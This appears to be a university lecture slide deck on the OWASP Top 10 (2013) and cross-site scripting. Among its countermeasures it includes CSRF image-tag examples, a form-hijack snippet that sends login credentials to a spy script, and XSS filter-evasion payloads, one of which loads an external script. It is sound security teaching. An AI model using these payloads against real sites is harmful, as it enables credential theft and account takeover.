Date post: | 28-Feb-2019 |
Category: |
Documents |
Upload: | hoangkhanh |
View: | 217 times |
Download: | 0 times |
Advanced Web Technology7) OWASP Top 10Vulnerabilities & Cross SiteScripting
Emmanuel BenoistFall Term 2016-17
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 1
Web Security: Most DangerousVulnerabilities
� Security for Web Applications?Specificities of Web Applications
� Top 10 vulnerabilities
� Vulnerabilities vs. Attacks
� Conclusion
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 2
Security for Web Applications?
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 3
Introduction:Web ApplicationSecurity?
What is a web Application?
What is dangerous?
We will see some vulnerabilities (the 10 most frequent)
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 4
Web Applications
Pure HTML web sitesDo not exist any more!
Scripting languagesPERL / PHP / ASPEasy to learnPerfect for small projectsNot designed for Multi-tier applications
.NET / J2EEBased on a script language (ASP / JSP)Allows the use of strong OO-Programming languagesDesign of large applications (multi-tier) easy
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 5
Risks for Web Applications?
For the system:Integrity of the SystemReputation of the systemService interruptedTotal destruction of the system. . .
For the userIdentity TheftPrivacy BreachLoss of MoneyAccount Destruction or ModificationsDestruction of one’s system (PC)
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 6
Specificities of Web Applications
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 7
Specificities of Web Applications
Available from anywhere in the worldAttackers may be worldwide
Based on specific protocolsMostly HTTP and HTTPS (and also streaming)Well known and definedRestrict the access points
Client - ServerProgrammer writes code for both sidesShould protect the server,Client can execute what it wants.
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 8
Top 10 vulnerabilities
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 9
OWASP Top 10
Presents the 10 most critical web application securityrisks
Produced by the Open Web Application Security Project(OWASP)Available on line www.owasp.org
Updated in 2013
Not Exhaustivehundreds of other issues occure in Web SecurityBut it is foccused on the most critical ones
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 10
OWASP Top 10Version 2013
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross-Site Scripting (XSS)
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing function level access control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using components with known vulnerabilities
A10 - Unvalidated Redirects and Forwards
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 11
A1 - Injection
User Supplied Data sent to an interpreterSQL injectionInterpreter injection (Shell, XML, . . . )
Attacker tricks the interpreter into executing unintendedcommands
Can control the DatabaseCan execute commands on the server
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 12
A2 - Broken Authenticationand Session Management
Account credentials and sessions tokens are often notproperly protected
A third can access to one’s accountAttacker compromise password, keys or authentication token
RisksUndermine authorization and accountability controlscause privacy violationIdentity Theft
Method of attack: use weaknesses in authenticationmechanism
LogoutPassword ManagementTimeoutRemember me. . .
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 13
A3 - Cross Site Scripting - XSS
If the web site allows uncontrolled content to besupplied by users
User can write content in a Guest-book or ForumUser can introduce malicious code in the content
Example of malicious codeModification of the Document Object Model - DOM (changesome links, add some buttons)Send personal information to thirds (javascript can sendcookies to other sites)
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 14
A4 - Insecure Direct Object Reference
Occurs when developer uses HTTP parameter to referto internal object
For instance http://mysite.com/program.php?lang=fr
And in the program:
require_once($_REQUEST[’lang’]."lang.php");
Can also access to other accountsFor instance http://mysite.com/program.php?page=124
It may be possible to change the page ID. The rights to seethe page have to be tested.
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 15
A5 - Security MisconfigurationProcess for keeping software up-to-date
OSWeb /App ServerDBMS
Is everything unnecessary disabled?ports, services, pages, accounts, priviledges
Are default account passwords changed or disabledBefore the first connection to the net
Is your error handling set to prevent informativemessages
Stack tracesSQL errors
Are the security settings in your developmentframeworks understood and configured properly
Struts, JSF, Spring, ASP.NETLibraries
Repeatable process is required
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 16
A5 - Security Misconfiguration(Cont.)
Application relies on a framework (JSF, Struts, Spring)A flow is found in the frameworkAn update is releasedYou don’t install the updateAttackers will used the known vulnerability
The application has a default admin page with defaultpwd
You forget to remove the tool and to change the pwdAttack logs in using default value
Directory listing is not disabledAttacker can browse directories and find any file.He downloads Java .class files and uncompile them, thenknows your code.
Access to “configuration” files not properly restrictedRead the database configuration in a “password.inc” file inPHP
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 17
A6 - Sensitive Data ExposureGive access to unprotected data
Sensitive data should appropriately be protectedEncryption and hashing of sensitive data is a MUST
Crypto should be taken seriouselyNo encryption (including no TLS) is a big riskEncryption needs to store data securely
Example1: Credit Card numbers stored in a Data BaseStored encrypted automatically by the DataBaseCan be retreived by SQL onlyVulnerable to SQL injectionSolution: store using a public key, only backend programknows the private key to retreive information
Example 2: No SSL/TLS encryption after the loginCookies of the user can be stollen, and reused for sessionhijakingSolution: Use TLS for all your interactions with authenticatedusers. And force cookies just to be sent to https site.
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 18
A6 - Sensitive Data Exposure (Cont.)
Example 3: Password hashed without a saltHashed password data can be stollen (sql injection or fileupload flaw)Hashes can be compared with precalculated hashes (rainbowtables)
ProtectionEncrypt all sentitive data anytime (even inside your internalnetwork)Discard sensitive data ASAPUse strong standard algorithms and keysDisable autocomplete for sensitive data and caching of pagescontaining sensitive data
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 19
A7 - Missing Function Level AccessControl
Users can access private informationAnonymous users access private pagesRegular users access privileged functions or data
sensitive functionalities:Some site just prevent the display of links or URL’s tounauthorized usersAttackers can access directly the URL’sThey gain access to protected areas
Examples of Hidden addresses/admin/adduser.php should only appear in the admin homepage,But if it is not protected, any user can access it.
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 20
A7 - Missing Function Level AccessControl (Cont.)
Code that evaluates privileges on the client rather thanon the server
Privilege tested in JavascriptAccesses to a hidden addressBut attacker can see the code and find the address
A logged-in user accessing data from another userPriviledges are tested for functionsBut not for data
Solutions:
Define precisely roles and their rightsFor each page test the rights of the userFor each data, test the rights to access the data
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 21
A8 - Cross Site Request Forgery -CSRF
Forces a logged on victim’s browser to send apre-authenticated request to a vulnerable webapplication
The victim is logged on a systemThe attacker has changed the content of the pageFor instance : Has added a javascript command / or changedan imageThis new command forces the browser (with the user rights) toaccess a resourceFor instance logout or change password
The attacker receives the same strength than the Userhas
He can do everything that the user can
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 22
A8 - Cross Site Request Forgery(Cont.)
ExampleWe have a page changepassword.php which accepts theparameter: newpassword=****
If the attacker adds the following image in the page
<img src="changepassword.php?newpassword=1234">
The password of the user may be changed!!!
This attack can be done from another serverThe image can point to any URL
<img src="http://www.mysite.com/changepwd.php?newpwd=1234">
Provided that the use has a running session, the browser willdo as asked.
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 23
A9 - Using components with knownvulnerabilities
Normal programs use softwares and librariesServerFramework librariesJavaScript library
Exploits are well knownCan be exploited by automatied toolsExpends the threat agent pool (script kidies for instance)
Example 1: Apache CXF Authentication BypassFalling to provide an identity tocken: invoke any web servicewith full permition
Example 2: Spring Remote Code ExecutionAbuse of EL language: execute arbitrary code
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 24
A10 - Unvalidated Redirects andForwards
If your program contains redirects (or forwards)If the URL contains a parameter valueVerify that the parameter is well tested.
Possible AttacksThe application has a page called “redirect.php” which takes aparameter “url”.The attacker can trick the user to be redirected to an evil page:http://www.example.com/redirect.php?url=evil.com
This can be used for fishing or install malware.
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 25
Vulnerabilities vs. Attacks
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 26
Vulnerabilities vs. Attacks
We have presented vulnerabilities of Web ApplicationsThe application AS IS offers entry points to some attacksIt is a way to see what is to protect
AttacksOften combine many vulnerabilitiesWork also at the level of consequences
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 27
Example of Attacks
PhishingAttract user on a web site while he think he is somewhere elseCombines Cross Site ScriptingWear or non-existent authentication or authorization checks
Privacy ViolationIs the result of:
poor validationpoor business ruleweak authorization checks
Identity Theft
System compromise, data alteration, or data destruction
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 28
Security vs. Privacy Protection
Protecting web sitesProduces a lot of logsLog file analysis => Attacker detection
Protection of Legitimate Users privacyEU directive on Data Protection protects the privacy of citizensIt may be illegal to log that much data
Trade-off : What should be stored?Define a privacy policyEncrypt the log filesAuthorize only a restricted number of persons to access thelogsDestroy logs after some time (according to your data retentionpolicy).
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 29
Conclusion
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 30
Conclusion
Web Security belongs to securityEncryption,Testing of inputsTeaching of users
It is somehow differentRestricted entrypoint port 80 (may be more easy to protect)Open infrastructure (anybody can visit and attack)International ArchitectureNo control on the client
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 31
Cross Site Scripting - XSS
� Presentation: Inject Javascript in a Page
� Javascript for manipulating the DOM
� XSS Factsheets
� Countermeasures
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 32
Presentation: Inject Javascript in aPage
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 33
Cross Site Scripting - XSS
If the web site allows uncontrolled content to besupplied by users
User can write content in a Guest-book or ForumUser can introduce malicious code in the content
Example of malicious codeModification of the Document Object Model - DOM (changesome links, add some buttons)Send personal information to thirds (javascript can sendcookies to other sites)
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 34
modus Operandi
Attacker Executes Script on the Victim’s machineIs usually JavascriptCan be any script language supported by the victim’s browser
Three types of Cross Site ScriptingReflectedStoredDOM injection
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 35
Reflected XSS
The easiest exploit
A page will reflect user supplied data directly back tothe user
echo $ REQUEST[’userinput’];
So when the user types:
<script type=”text/javascript”>alert(”Hello World”);</script>
He receives an alert in his browserDanger
If the URL (containing GET parameters) is delivered by a thirdto the victimThe Victim will access a modified pageSSL certificate and security warning are OK!!!
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 36
Stored XSS
Hostile Data is taken and storedIn a fileIn a Databaseor in any other backend system
Then Data is sent back to any visitor of the web site
Risk when large number of users can see unfilteredcontent
Very dangerous for Content Management Systems (CMS)Blogsforums
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 37
DOM Based XSS
Document Object ModelThe document is represented using a treeThe tree is rooted with the document nodeEach tag and text is part of the tree
XSS Modifies the Document Object Model (DOM)Javascript can manipulate all the documentIt can create new nodes,Remove existing nodesChange the content of some nodes
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 38
Real XSS are a mix of the three types
To be efficient an attacker has to combine the typesAttacker logs on the systemtypes his malicious contentcontent is stored on the server (often in a Database)When the user visits the site his dom is manipulated
Target:Send information to another siteor another part of the site
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 39
Javascript for manipulating the DOM
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 40
Javascript for manipulating the DOM
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 41
Document Object ModelHTML is converted into a tree
<html><body><div id=”header”>
<h1>Title of the page</h1></div><div id=”menu”><ul id=”menu−list”><li class=”menuitem”>
<a href=”index.php?id=1”>One</a></li><li class=”menuitem”><a href=”index.php?id=2”>Two</a></li><li class=”menuitem”><a href=”index.php?id=3”>Three</a></li↘→>
</ul></div><div id=”content”><p> Hello World </p>
</div></div></body></html>
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 42
Document Object Model (Cont.)
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 43
Javascript can manipulate the DOMCreate a new node and insert it in the tree
var newli = document.createElement(”li”);var newtxtli = document.createTextNode(”Four”);newli.appendChild(newtxtli);document.getElementById(”menu−list”).appendChild(newli↘→);
Delete a node
firstchild = document.getElementById(”menu−list”).↘→firstChild;document.getElementById(”menu−list”).removeChild(↘→firstchild);
Modify a node
document.getElementById(”addbutton”).onclick=↘
→otherFunction;
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 44
Spy the content of a formSpy remains unnoticed by the user
Suppose a page contains such a form
<form action=”login.php” method=”POST” id=”login−form”>Username <input type=”text” name=”username”>,Password <input type=”password” name=”password”>
</form>
If the following Javascript is injected in the page
document.getElementById(”login−form”).action=”spy.php”;
And the spy.php looks like:
$username = $ REQUEST[’username’];$password = $ REQUEST[’password’];// Save data in a Data base or a file$newURL = ”http://www.mysite.de/login.php”;$newURL .= ”?username=$username&password=$password”header(”location: $newURL”);
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 45
AJAXAsynchronous Javascript and XML
Javascript is used for interacting with the clientClient receive the page from the serverJavascript handles events,reacts to key down, value changed, mouse-over, etc.
Javascript establishes an asynchronous communicationwith the server
Creates a XMLHTTPRequest objectSends a request to the server (without refreshing the page)Modifies the page according to the data received from theserver
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 46
Connect another server
“Same Origin Policy” prevents from connecting anotherserver
Browser is configured to connect only one siteIt can also connect to other sites in the same domain orsubdomainJavascript is allowed only to send XMLHTTPRequest object tothe server of the page
Attacker wants to receive information elsewhere:Modify the DOM to insert a new fileCreate a request that contains the informationIf the file contains JavaScript, a communication is possible!!!
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 47
XSS Factsheets
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 48
Testing StrategySuppress any javascript in posts
Test is post contains a javascript instructionQuite Hard, can be hidden.
Examples of javascript instructionsJavascript in <script> tag (the normal way)
<script type=”text/javascript”>// Here comes the script</script>
Or from an external file 1
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Javascript as eventhandler
<span onmouseover=”alert(10);”>Test 1</span>
Javascript as URL
<a href=”javascript:alert(’XSS’);”>Test 3</a>
1Source: http://ha.ckers.org/xss.htmlBerner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 49
Examples of tests2
The following XSS scripts can be inserted in pages, totest if the protection is in order:
Display a alert with XSS
’’;!−−”<XSS>=&{()}
Loads the file xss.js on the corresponding server
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
The false image loads a javascript
<IMG SRC=”javascript:alert(’XSS’);”>
2Source: http://ha.ckers.org/xss.htmlBerner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 50
Examples of tests (Cont.)The same instruction using UTF-8 encoding
<IMG SRC=&#↘
→106;avascript:alert('XSS')>↘
→
Adding some extra brackets will allow to circumvent sometesters
<<SCRIPT>alert(”XSS”);//<</SCRIPT>
Don’t use the javascript instruction
<BODY ONLOAD=alert(’XSS’)>
Use the Meta tag
<META HTTP−EQUIV=”refresh” CONTENT=”0;URL=http://;URL=javascript:alert(’XSS’);”>
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 51
Countermeasures
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 52
ProtectionCombination of
Whitelist validation of all incoming data
Allows the detection of attacks
Appropriate encoding of all output data.prevents any successful script injection from running in thebrowser
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 53
Input Validation
Use Standard input validation mechanismValidate length, type, syntax and business rules
Use the “Accept known good” validationReject invalid inputDo not attempt to sanitize potentially hostile dataDo not forget that error messages might also include invaliddata
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 54
Strong Output Encoding
Ensure that all user-supplied data is appropriately entityencoded before rendering
HTML or XML depending on output mechanismmeans <script> is encoded <script>
Encode all characters other than a very limited subset
Set the character encoding for each page you outputspecify the character encoding (e.g. ISO 8859-1 or UTF 8)Do not allow attacker to choose this for your users
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 55
Language Specific recommendations
JavaUse Struts or JSF output validation and output mechanismsOr use the JSTL escapeXML="true" attribute in <c:out
...>
Do not use <%= %>
.NET: use the Microsoft Anti-XSS Library
PHP: Ensure Output is passed through htmlentities()or htmlspecialchars()
You can also use the ESAPI library developped by OWASPContent is first validatedThen it is canonicalize()d to be storedThe output is then encoded using: encodeForHTML(),encodeForHTMLAttribute() or encodeForJavascript()functions (depending on the use).
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 56
Decoding / Encoding UntrustedData3
3Source: Javadoc documentation of the ESAPI packageBerner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 57
Conclusion: Cross Site Scripting
Attacker injects input in a pageStored data in pages where many users can send input: CMS,Guestbook, etc.Or Reflecting-XSS in a field that is displayed to the user.
Javascript takes control of the Victim’s browserCan manipulate the Document Object Model (modify thepage)Can send information to a third server
CountermeasuresValidation of input (rejection of anything that could be invalid)Encoding of output.
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 58
References
OWASP Top 10 - 2013http://www.owasp.org/index.php/Category:
OWASP_Top_Ten_Project
A Guide for Building Secure Web Applications and WebServiceshttp://www.owasp.org/index.php/Category:
OWASP_Guide_Project
XSS (Cross Site Scripting) Cheat Sheethttps://www.owasp.org/index.php/XSS_Filter_
Evasion_Cheat_Sheet
Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 59